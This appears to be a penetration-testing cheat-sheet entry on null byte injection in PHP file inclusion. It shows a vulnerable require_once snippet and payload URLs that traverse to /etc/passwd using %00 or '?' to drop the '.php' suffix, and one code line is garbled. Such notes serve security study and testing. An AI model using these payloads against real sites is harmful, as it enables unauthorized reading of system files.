# Null Byte Injection

* **Useful in case where php adding extension at the end of file name**
* In some specific cases you need to add a null byte terminator to the LFI/RFI vulnerable parameter. **A Null byte is a byte with the value zero (%00 or 0x00 in hex) and represents a string termination point or delimiter character.** Adding a null byte to a payload can alternate intended program logic as **it immediately stops the string from further processing any bytes after the null byte. This means that any bytes after the null byte delimiter will be ignored.**

## **Example**

Let's consider following code:

```
$file = $_GET['page']; 
require_once("/var/www/$file.php");
```

Now if we inject /etc/passwd in it , it will look something like this -

```
passwd = $_GET['page']; 
require_once("/var/www/../../../etc/passwd.php");
```

In this case **we cannot conduct File Inclusion with the passwd file because the second line appends a PHP extension to the file name and effectively converts the passwd file to passwd.php** which would result in a ‘file not found error’. In such a case, **we can add a null byte to the passwd file name to terminate the string at the null byte and discard the ‘.php’ extension.**

## Null Byte

```
http://website/page=../../../etc/passwd%00

http://example.com/page=../../../../../../etc/passwd?

/etc/passwd%00jpg     
```